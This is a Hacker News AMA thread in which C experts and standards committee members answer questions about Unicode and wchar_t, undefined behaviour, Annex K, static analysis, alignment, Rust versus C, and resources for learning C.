For instance, the macOS clang environment does not define this symbol. Is their implementation of wchar_t or <wctype.h> lacking some aspect of Unicode support?


If that macro is defined, then wchar_t is able to represent every character from the Unicode required character set with the same value as the short code for that character. Which version of Unicode is supported is determined by the date value the macro expands to.

Clang defines that macro for some targets (like the Cloud ABI target), but not others. I'm not certain why the macro is not defined for macOS though (it might be worth a bug report to LLVM, as this could be a simple oversight).


Would the following be a correct way to determine whether there's a problem?

* First call setlocale(LC_CTYPE, "en_US.UTF-8")

* Next feed the UTF-8 string representation of every Unicode codepoint one at a time to mbstowcs() and ensure that the output for each is a wchar_t string of length one

* If all input codepoints numerically match the output wchar_t UTF-32 code units, then the implementation is officially good, and should define __STDC_ISO_10646__?


I think this is correct, assuming that locale is supported by the implementation and wchar_t is wide enough, but I am by no means an expert on character encodings.


Should work provided your wchar_t type is at least 21-bits wide.


Have any of you looked at the CHERI hardware architecture and fat capability pointers, broadly?


Has there been a survey to determine what percentage of known compilers support each C version, like C89, C99, C11? I've been sticking to C99 because I assumed later versions won't be widely adopted for a long time to come. Is this accurate?


There is a Web page I saw a few days ago that does that, probably findable by grepping Wikipedia. Unfortunately I forget its URL.


I frequently rely on reading and writing uninitialized struct padding in code that compare and swaps the underlying struct representation with some (up to 128bit) integer.

I could use a union type, but that adds extra memory operations, and is finicky.

Is there a better way?


What's an example of a codebase where _Generic has had a notable positive impact?


Not necessarily a code base, but _Generic is what makes <tgmath.h> implementable for the type-generic math functions.


What is the difference between C objects(#aka region of data storage in the execution environment, the contents of which can represent value) and objects in C++ in terms of representations and usage?

# from Chp2 of Effective C


Are there any plans to add support for multiple register return values to C?


What are you asking for? Do you mean that if you return a small struct from a function, the fields are placed in registers instead of memory, if they can fit? This is up to the ABI, not the standard, to define, and some ABIs already do that.


None that I'm aware of.


How should I represent Unicode in memory?! UTF8? 16? 32bit integers? I keep hearing pros and cons of all the previous three. Is there a consensus? In cases where you don’t need a full blown Unicode lib.


A more chill question for you - What's your favourite string library?


Hi, I have two questions.

1) Are there any plans or discussions on having a subset/extension of C that is designed for formal verification? Much like SPARK with ADA.

2) Is there no plan to support GC? Even as an extension of C?


Tell me where I can get the C89 standard for free (pdf or other formats)


The last time I needed it, archive.org had a link to a PDF of it.

I couldn't find that again in one minutes, but here is the text version: http://web.archive.org/web/20030222051144/http://home.earthl...


Thanks


What's prevent you from buying K&R?

A paperbook is less likely to be lost and K&R is the more affordable reference to C rather than ISO 9899.


This is a subjective question. From the array of tools in your belt, when do you personally/professionally reach for C, or maybe more interestingly, when do you not reach for C?


Since I do almost all my software development in a Unix environment, usually I check the toolbox to see if there is already a program that has nearly the functionality I want, and if so then I cobble together a shell script. Sometimes (as with the Sudoku solver) it will be necessary to build a new component, and for that I usually use C since I am comfortable and experienced with it. (Also, if coded in Standard C, odds are that I can install it on whatever platform I need, with little or no adaptation.)


I'm trying to learn C during this quarantine times. I'm looking for good beginner-friendly opensource projects to learn from. Can you please suggest some repositories to look into?


(obviously, i'm not one of the panel members, just chiming in.)

if you're interested in looking at how C can be used in embedded realtime operating systems, i recommend diving into:

https://github.com/ARMmbed/littlefs

(i'm not affiliated.)

it's a lean, logging flash filesystem implementation and i recommend it because the research, rationales, documentation, organization, codebase, test harness, and public API ergonomics all impressed me a lot. it was written for the mbed OS, but it is so well designed that i could integrate it into any realtime OS without too much trouble. and the documentation is thorough enough that after skimming the wikipedia article for filesystems, and maybe an article on how flash chips read and write data, you'll be able to work your way through it. i learned a lot by reading through that repository.


A ton of comments here talk about arrays and basic preconditions. See frama-c.com. even in c++ where encapsulation helps class/function contracts and unit testing is a must


In C89 is there a portable way to figure out the alignment requirement for a struct, to be able to, say, store it after the NUL terminator in the same allocation as a C string?


I'm not sure what your requirement is. Usually things work out if you're careful not to assume any specific value for alignment etc. It may mean a few unused bytes here and there, but keeping things simple and portable often pays off.


Being able to know your alignments is VERY important for a lot of network implementations. They are all defined by the ABIs, but its very annoying that the standard keeps thinking that alignment is unknowable, when in fact its impossible to implement a ABI without defining it. One of the reasons I stick to C89.


Note that the ABIs cover endianness as well as value range and/or object widths. In general, one needs to have explicit marshaling and unmarshaling functions to map from network octet array and C internal data representation. Failure to get this right is (or used to be) a common bug for code developed and tested on too few architectures.


Sure, it wont be portable between any architectures, but a lot of times you know you will be on a little endian platform where types are aligned to their sizeofs. That covers a lot of ground and the performance gains you get from optimizing with this in mind is significant. There is value in C being able to be portable, but there is also a huge value in being able to write non-portable code that takes advantage of what you know about the platform. C needs to acknowledge that that is a legitimate use case.


Do you think that static analysis is a valuable tool for security research? Do you recommend static analysis software to a single developer with a limited budget or an amateur?


Yes, both :) There are a few in public domain that might be helpful to experiment with. Clang has had a static analyzer for a while and GCC 10 adds one as well (and the maintainer is looking for help with implementing checkers so that's a good way to gain experience with writing one).


would love to see a couple of detailed comments on this directly as well, I know that one of yall is a maintainer of an analyzer, maybe just some general discussion on beginning to learn C while at the same time incorporating a static analyzer and what that would look like.


What did you think of the Stuxnet code from your perspective? Was it clear who made it from the start, and what it's purpose was? (Iran or China vs India?). Thanks.


About time someone advocated for code in lower level styles of programming. Hope it goes well!

Anyway, here's some questions:

- What kind of programs would you say C is a good fit for?

- There is some catching up to do for C. Is there a roadmap for C improvement, or even a recommendation of C++ things that fit somewhat in the style/philosophy of C? For example, I'd recommend not using the C++ smart pointers stuff, while still using C++ threads and lambdas.

Also, you should include programmers from other fields in your committee. Game (engine) developers, HFT programmers are used to lower level styles of coding and align with your perspective.


When do you think we will get an update to C11 or more recent version of C to MISRA? Do you all have any influence on "Safety Critical C" standards?


The MISRA committee is a separate organization from the C standards committee, but there is overlap between the two groups and an official liaison process for the committees to collaborate. So there's a bit of bidirectional influence between the two groups.

I am not on the MISRA committee, but I believe they talk a bit about their public roadmap in this video: https://vimeo.com/190304951


What are your recommendations on going about learning the C language properly? And How to go about learning all levels of abstraction of the language?


Other than these experts, what kind of companies do C developers work at? How does the compensation look like compared to doing web development?


I do not actually develop in C (other than short examples to feed the C analyzer that I work on, which is not written in C) but our customers do employ plenty of C developers. These customers are developing embedded software that reads inputs from sensors, process them, and send the final results of the computations to actuators, in fields such as IoT, aeronautics, rail, space, nuclear energy production, autonomous transportation, …

The list is very much biased by the sort of analyzer we provide. There are certainly plenty of non-embedded codebases in C and of developers paid to maintain and extend them, it's just that we currently do not work with them as much.

I do not know about whether the compensation is better or worse than for other technologies.


I want this feature in the standard.

If there exists any memory block allocated using malloc() / calloc() / realloc() which has not been free()'d, at the end of the program, they would be free()'d automatically.

One can easily do it with keeping a linked list and using atexit(), but, can it be added to the standard?

A general question, will anything, any feature, which is "easy" to implement in pure C, like array knowing its own length or pascal strings, NOT be allowed to be in C standard, even if it is widely used, maybe almost everywhere?


The operating system handles this for you on process deletion. Lots of “one shot” programs count on this (and (e.g.) file descriptors being automatically closed).


So, should I not care about that so much, and write programs without free()'ing allocated memory?

If OSes do that, why not standardize that in C?


CAN I HAZ UNNAMED UNUSED PARAM

   void callback(int x, void *) // VOID STAR UNUZED, SO ANON
   {
      foo(x);
   }


Why is there a second argument which is not used?


It could be for function pointer type compatibility.

There is an array of pointers, or there is a callback interface, or something like that. The type is set in stone.


To match an API where it is sometimes used.


Know it's not exactly related to what you do. But do you have some recommendations of books/online classes to learn C?


How accurate, relevant, and useful today is http://c-faq.com ?


It's a bit dated (it hasn't been updated since 2005), but apart from that I'll say that parts of it are excellent.

In particular, section 6 is the best resource I know of for explaining the often counterintuitive relationship between arrays and pointers.


Why is shifting by a negative amount undefined?


Because people want `c = a << b` to compile into `shl c, a, b` and C89 made the giant mistake of calling it ‘undefined’ instead of ‘implementation-defined, possibly fatal’.


How do modern C developers approach writing secure network code in C? Are there any tools for verifying network code?


1. What is the easiest way to build cross-platform (native) GUI with C?

2. Why it is harder to find lgpl licenced libraries to access windows directories over network like jcifs pysmb (and libraries overall) when needed to close most part of software source to sell small softwares to businesses?

3. If you needed to combo C with another language to do everything you need to do forever and never look back what other language would that be?


To what extent does compiler complexity factor into your thinking about the evolution of C?

Thanks for this!


When the committee considers proposals, we do consider the implementation burden of the proposal as part of the feature. If parts of the proposal would be an undue burden for an implementation, the committee may request modifications to the proposal, or justification as to why the burden is necessary.


Thanks. Do you have an example of a proposal that the committee considered an undue burden for an implementation but was otherwise sound?


Not off the top of my head, but as an example along similar lines, when talking about whether we could realistically specify twos complement integer representations for C2x, we had to determine whether this would require an implementation to emulate twos complement in order to continue to support C. Such emulation might have been too much of a burden for an implementation's users to bear for performance reasons and could have been a reason to not progress the proposal.


Can/should the C language be extended to better support vector processors and GPGPU?


Quite a few new languages generate C code for the “backend” of their compiler. For example ATS and the ZZ language.

This helps bringing these languages to embedded targets with closed toolchains (with an existing C compiler).

Will there be developments to use a subset of C as a “portable assembly” in a standard way? Like there is WebAssembly for JavaScript.


That doesn't seem likely. There have been no proposals for anything like it and there is a general resistance to subsetting either C or C++ (the exception being making support for new features optional).


How and why will C combat Rust?


In my opinion, the two languages are going to co-exist for a long time. C has billions of lines of legacy software written in it… In recent news, COBOL developers were sought after in order to update existing COBOL software, so the same thing will happen with C, perhaps to the end of humanity (I have become pessimistic as to humanity's future).

There are pieces of software that should be given priority for a rewrite in Rust, but most of C software is never going to be rewritten, because there is simply too much of it.

Therefore, even if C did not have any advantage of its own over Rust, there would still be legacy software to maintain and to extend.

The advantages of C include that sometimes, an embedded processor with a proprietary instruction set is provided by the chipmaker with its own C compiler, which is the only compiler supporting the instruction set; that C is still currently used to write the runtimes of higher-level languages (I'm familiar with OCaml, but it isn't too much of a stretch to imagine that the runtimes of Python, Haskell,… are also written in C).


> In my opinion, the two languages are going to co-exist for a long time.

It goes deeper than that, in a couple of places Rust depends on the C standard: the fixed-layout `#[repr(C)]` structs (without that attribute, the compiler is free to reorder the struct fields; with that attribute, it's laid out the way C would do it), and the `extern "C"` function call ABI. The way to call any other language from Rust, or Rust from any other language, is to go through `extern "C"` functions passing `#[repr(C)]` structs. So even if the C language dies one day, parts of it will live in Rust forever (or as long as the Rust language lives).


There's tons of legacy C around, we have to maintain it, it's not ideal unless you're on some niche platform, lots of stuff should probably be written in a better language . . .

I sincerely hope this is not the general attitude of the standards committee. Some of us actually prefer C, and would like to see the language continue to flourish.


Note that among the C experts participating in this AMA, I am not one who is in the standardization committee. At 14:59 EDT, just before the AMA was posted, we were joking between ourselves about me having to post this disclaimer but I guess there was a hidden truth in the joke.


C is a pretty well established language, so this question should probably be asked the other way around. C was primarily designed to complete with FORTRAN.


Rust has a package manager while C and C++ don't (as far as I now). This alone make Rust more attractive for some projects. I hope C and C++ get one.


How to become a compiler engineer if you don't have a degree in CS?


What GNU C extensions do you think ISO WG14 would more readily accept?


will we ever see compile time programming in C like constexpr in C++?


pascal_cuoq - Pascal Cuoq is the Chief Scientist at TrustInSoft and co-inventor of the Frama-C technology

This looks to be a hell'va' good tool chain. I'm playing with as of yesterday.


Any chance of getting something like Frama-C officially blessed?


Do you think object oriented languages are better than C to develop GUI-based cross-platform programs?

The licenses of the majority of third-party libraries available for C are GPL, do you think this makes harder reusing code to sell software?


Any chance that we could have an STL equivalent in C. Of course, templating and other features being absent it won't be as generic as CPP. However, having even something close to STL will help in the long run. Thanks!


There is always a chance. We would need to see a proposal based on experience with an existing implementation.


Has there been consideration of async/await semantics?


Is memset(malloc(0), 0, 0) undefined behavior?


Let's assume the types have been corrected. malloc((size_t)0) behavior is defined by the implementation; there are two choices: (a) always returns a null pointer; or (b) acts like malloc((size_t)1) which can allocate or fail, and if it allocates then the program shall not try to reference anything through the returned non-null pointer. Now, memset itself is required (among other things) to be given as its first argument a valid pointer to a byte array. In particular, it shall not be a null pointer. Tracking through the conformance requirements, if the malloc call returns a null pointer then the behavior is undefined. Thus, you should not program like this.


What observable difference is there between malloc(0) and malloc((size_t)0)?


None.


I agree but he said the types needed to be corrected. As far as I know the types were already correct.


The argument "0" is not automatically converted to the right type unless there is a prototype in scope. It isn't as important in this case because it is highly likely that the appropriate prototype has been #included, but it is a bigger deal if we're dealing with arguments for a variadic function. Anyway, it's good to be reminded what the declared types are.


Are you serious? Of course the question comes with the reasonable assumption that the proper declaration has been made especially since it’s a well known standard function. Additionally memset() is not a variadic function.

You said the types were corrected, you didn’t say you were reminding about the declaration types. The types were correct from the start.


Something in the works for Async & Await?


What is your favourite design pattern?


What do you think about Web Assembly?


can we get compile time constant variables? something cleaner than enums and defines


is there no way to make C "memory-safe" during compilation?


There are a bunch of research projects that did just that. And even just compiling with address sanitizer makes it "memory-safe" to a significant degree.


can you link any to check out?


Is a time of Rust and Golang, how is C still relevant? (Sincere question)


There's millions of lines of C code that isn't going anywhere, and still many platforms that those languages don't support.


Some simple instructions about how to use a thread for conversation would be appreciated. Thanks!


There are very little formatting options when writing posts, for better or for worse: https://news.ycombinator.com/formatdoc


Nothing to it! Just hit the reply button on comments you want to respond to. You can also upvote anything you like by clicking on the up arrow to the left of the comment.


Okay, is there a starting thread for today's C Experts panel? I miss the old net newsgroups.


The thread is https://news.ycombinator.com/item?id=22865357, which is the page you've been posting to. It's now listed on the front page of the forum, https://news.ycombinator.com/, which is a list of the stories people have upvoted today.

You're not the only person who misses the old newsgroups! The format that Hacker News uses is one that became sort of standard on the web in the early 2000s. It works differently than usenet did, but you get threaded comments in the sense that replies are nested under the posts they're replying to.


Hello, I coded in C as a high schooler. Now, 16 years later, I have to code C again semiprofessionally after a very long break.

Big question, how to start programming in C on a high professional level for somebody self schooled in it? Is there a way to cut the corner, without having to go through 10+ years trial and error to gain experience?

Anything for somebody ready to sit, study, and practice for a few hours a day?


There was a nice discussion recently https://news.ycombinator.com/item?id=22519876


I'm in a similar situation as the parent comment, wanting to re-learn C after more than a decade (or two). Thanks for the link to a recent discussion! For the parent, here are some of the recommended books:

Head First C - Griffiths and Griffiths

Expert C Programming: Deep C Secrets - Peter van der Linden

Modern C - Jens Gustedt

C Programming: A Modern Approach - K. N. King

21st Century C: C Tips from the New School - Ben Klemens

Understanding and Using C Pointers - Richard Reese

C Interfaces and Implementations: Techniques for Creating Reusable Software - David R. Hanson

The Standard C Library - P. J. Plauger


Compilers are much more helpful now. Better diagnostics, more options for warnings.


Hey guys,

How likely would the standard be to accept a proposal to add compile time reflection to the preprocessor, or even adopt C++'s constexpr?

My use case is creating a global array in a header from static compound literals in multiple source files at compile time, and outside of some crazy clang-tblgen type solution, or very platform specific linker hacks, it's completely unsupported by C.


How much UB does your own code contain, folks (and what practices do you follow to avoid it)?

Cheers from the shadowland :)


Anybody know where Dan Pop went and what he's up to these days?


[flagged]


Please don't do this here.


Is it worth it to learn C in 2020 ? Will it still be a prominent language for systems programming in the future ?


Yes.

- Languages like Rust will gain more mindshare over the next decade, and be used in more and more new projects, but there are billions of lines of existing code in C, and those aren't going away.

- Hardware architects, for better or worse, largely think about software in terms of [a somewhat dated and idealized mental model of] C. So if you want to be able to converse with architects (which anyone doing systems programming should want to do), you need to have some basic fluency with C.


I believe C will continue to be used as lingua franca after no one uses it to write software, and we're decades from even that point.

You need to know enough C to interface with the OS, and enough C to talk about memory layout, memory management, dynamic libraries, ABI, etc.

Most higher language runtimes need C, even with a self hosting compiler. Not being able to work on the C parts is limiting.

You also need to know enough assembly to be able to understand what the compiler did with your own code, even if you never write assembly yourself. Not being able to compare the disassembly to the high level language to understand why it doesn't work (or is order of magnitude slower than expected) is limiting.


C also has renewed interest around IoT programming and mobile devices


How do you join three float values into a comma separated string, and then split it again?


Not sure what you mean but would

  s8 buf[enoughspace];
  snprintf(buf, sizeof(buf), "%f,%f,%f", your, three, values);
  sscanf(buf, "%f,%f,%f", &your,  &three, &values);
Do the job?


I think that the GP was making a commentary on the sorry state of locale handling in C.

You need to first store the current locale, change the locale to one that doesn't use a comma as the decimal point, perform the above, and set the locale back. Plus, there's no threadsafe way to do this, since the locale is process-wide.


Why is still the learning curve for C so high?

* Why can't the learning curve be solved using tools? * Why don't we actively promote more higher level languages which are implemented in C (by fewer people)?


I think that C provides fewer layers of abstraction than other languages. This requires the programmer to deal with memory management, treat strings as an array of characters, and other things that the majority of high-level languages conceptualise, so that the human mind deals with it more easily. This provides advantages and disadvantages, as it requires more thought and understanding to write the code but also allows the use of low-level features. The lack of tools to solve any learning issues is probably down to the programmer needing the right conceptual understanding and the requirements placed on anyone using the various features of the language.


Do you find the learning curve for C to be high? I find it quite the opposite. It's a simple language with only a few concepts to learn, once you got those, that's it. There might be some preprocessor tricks you'll pick up later, but the base language and library is pretty comprehensive IMHO.


> It's a simple language with only a few concepts to learn

I mean by that logic, Assembly could be deem even simpler, yet writing OR reading programs in Assembly is absolutely not simple at all.

At the end of day, one has to write programs that solve (complicated) problems, and learning how to do that in C is difficult, thus the learning curve deemed higher when it comes to writing professional C.

I can guarantee you that writing professional Go or Java and writing correct programs in both takes way less effort than with C, for use cases that would make Go or Java viable.


Modern assembly language has a huge set of instructions, that make them hard to learn, but the concept is still easy to learn.


Many antique computers are simulated by SIMH. If you have the corresponding software, you can operate on your desktop a simulated computer's software development system. For example, DEC VAX (VMS or Unix) has a relatively simple and sane assembly language.


I think, learning a tiny bit of assembler, even if in an emulator, is very valuable to teach the basics.


C is indeed a very small language. But the expressive power of C for real-world problems brings a huge learning curve in terms of organization, tracking, and understanding.


Coming from python/js I found it to be high. Mostly because of the memory management/ making sure I call free correctly etc. In many cases where I would plow ahead in programming, with C I had to stop and would feel dread. A lifesaver for me was using C/C++ Repl environments where I could quickly prototype or sanity check things I was doing.


The trick is to just not use `malloc()` and `free()` unless absolutely necessary ;)


> The trick is to just not use `malloc()` and `free()` unless absolutely necessary ;)

The problem is that often C programmers have to deal with API and libraries they didn't write themselves to solve their problems, thus are forced to use constructors and destructors even when they don't want to.


Syntax of pointers. Easy to use high level languages make extensive use of pointers (i.e. all their variables are actually pointers) but beginners cope with them because no stars or ampersands are required, with the help of GC. Of course they'll get bitten soon and often because it is too easy to create copies of pointers rather than copies of full data structures, and without understanding pointers it's hard to grasp why that happens.


I taught myself C from just reading code and trying to contribute to a few projects right out of high school, no books, no school.

So I don't think C has a very high learning curve, C++ on the other hand...


1. When will we get proper strings in the stdlib?

2. When we will get the Secure Annex K extensions?

3. When we will get mandatory warnings when the compiler decides to throw away statements it thinks it doesn't need? Like memset or assignments. Compilers are getting worse and worse, and certainly not better.

ad 1) Strings are Unicode nowadays, not ASCII. Nobody uses wchar but Microsoft. Everybody else is using utf8, but there's nothing in the standard. Not even search functions with proper casing rules and normalization. Searching for strings should be pretty basic enough.

2. The usual glibc answer is just bollocks. You either do compile-time bounds checks or you don't. But when you don't, you have to do it at runtime. So it's either the compilers job, or the stdlib job. But certainly not the users.


For (2) I guess it depends. Annex K is obviously already a part of the standard so it depends on the implementation. There is a push to eliminate Annex K altogether from the C Standard. If this push fails, it may be the case that more libraries will add support for this optional feature of the language. In the meanwhile, there is the Open Watcom compiler implementation [1], the Safe C Library [2], and Slibc [3].

[1] Watcom C Library Reference Version 1.8. Open Watcom. 2008. ftp://ftp.openwatcom.org/manuals/current/clib.pdf

[2] Safe C Library — A full implementation of Annex K https://github.com/rurban/safeclib/

[3] slibc https://code.google.com/archive/p/slibc/


For (3) mandatory warnings the closest thing is probably ISO/IEC TS 17961:2013. The purpose of ISO/IEC TS 17961 is to establish a baseline set of requirements for analyzers, including static analysis tools and C language compilers, to be applied by vendors that wish to diagnose insecure code beyond the requirements of the language standard. All rules are meant to be enforceable by static analysis. The criterion for selecting these rules is that analyzers that implement these rules must be able to effectively discover secure coding errors without generating excessive false positives.


Going to try to answer these separately. For (1) if you mean strings that are primitive types my guess is never. When had an hour discussion on this topic at a London meeting where we were discussing new features for C11 and my take away was that this would never happen because it would require a significant change to the memory model for the language.


For the u8 type sure. Nobody needs a new type.

But at least add wcsnorm and wcsfc as I implemented them in the safeclib are required. Not even coreutils, grep, awk, ... can search unicode strings.

And u8 library variants of str* and wcs* are definitely needed, maybe just with uchar* not char*.


Why would the utilities not handle unicode searching? Unicode characters match properly, the null terminator works the same, and non-ANSI codes are just one or more random 8-bit values which can be compared, copied, etc.


I am sorry to tell this but the C programming language doesn't need anymore the ISO committee since it introduced non de facto standard features such as VLA.

For reference I still use The C Programming Language by KERNIGHAN/RITCHIE and The Standard C Library by PLAUGER.

In my view what programmers need the most is good practices rather than any syntactic sugar.

I prefer C rather than any other programming language for its conciseness.

There is opportunities for any new programming language to replace C if it is at least backward compatible with K&R C SE (aka ISO C90) and provides a portable access to de facto standard hardware acceleration such as SIMD instructions for vector computing.

For now we have to write in assembly language SIMD optimized libraries in order to get the full calculation power of modern processors.

For programmers who expect C to bring them a hot drink, I would recommend them to stick with the bloated C++ framework which sometimes enlarges your p*s. :-P


No answer but -2 points.

It seems cowards don't have any argument. :-)


A bit off topic, but what are your views on Golang? I'm leaving this pretty open-ended, but I'm curious how you see it interacting with the C/C++ ecosystem in the future.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: